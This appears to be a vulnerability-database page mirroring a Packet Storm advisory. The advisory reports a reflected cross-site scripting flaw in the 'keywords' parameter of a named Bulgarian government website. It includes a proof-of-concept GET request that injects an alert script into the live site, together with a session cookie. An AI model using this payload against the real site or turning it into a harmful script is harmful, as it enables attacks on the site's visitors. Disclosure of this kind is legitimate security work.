Lucene search
K

📄 ahu.mlsp.government.bg Cross Site Scripting

🗓️ 19 Jan 2026 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 165 Views

Reflected scripting via keywords parameter echoes input, allowing JavaScript.

Code
## Titles: ahu.mlsp.government.bg-XSS-Reflected-CRITICAL Cross-site scripting (reflected)
    ## Author: nu11secur1ty
    ## Date: 1/18/2026
    ## Vendor: ahu.mlsp.government.bg
    ## Software: ahu.mlsp.government.bg
    ## Reference: https://portswigger.net/web-security/cross-site-scripting
    
    ## Description:
    The value of the `keywords` request parameter is copied into the HTML
    document as plain text between tags. The payload
    fpizv<script>alert(1)</script>b6a49ruc4py was submitted in the keywords
    parameter. This input was echoed unmodified in the application's response.
    This proof-of-concept attack demonstrates that it is possible to inject
    arbitrary JavaScript into the application's response.  The original request
    used the POST method, however it was possible to convert the request to use
    the GET method, to enable easier demonstration and delivery of the attack.
    
    STATUS: HIGH- Vulnerability
    
    [+]PoC:
    ```
    GET /search/?keywords=fpizv%3cscript%3ealert(1)%3c%2fscript%3eb6a49ruc4py
    HTTP/1.1
    Host: ahu.mlsp.government.bg
    Cache-Control: max-age=0
    Sec-CH-UA: "Chromium";v="143", "Not;A=Brand";v="24", "Google Chrome";v="143"
    Sec-CH-UA-Mobile: ?0
    Sec-CH-UA-Platform: "Windows"
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Cookie: JSESSIONID=B73DAEC7FBA9D531A0EA45F18C6A5B19
    Origin: null
    Upgrade-Insecure-Requests: 1
    
    ```
    
    ## Demo PoC:
    [href](https://www.patreon.com/posts/ahu-mlsp-bg-xss-148520630)
    
    ## Time spent:
    01:27:00

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jan 2026 00:00Current
4.9Medium risk
Vulners AI Score4.9
165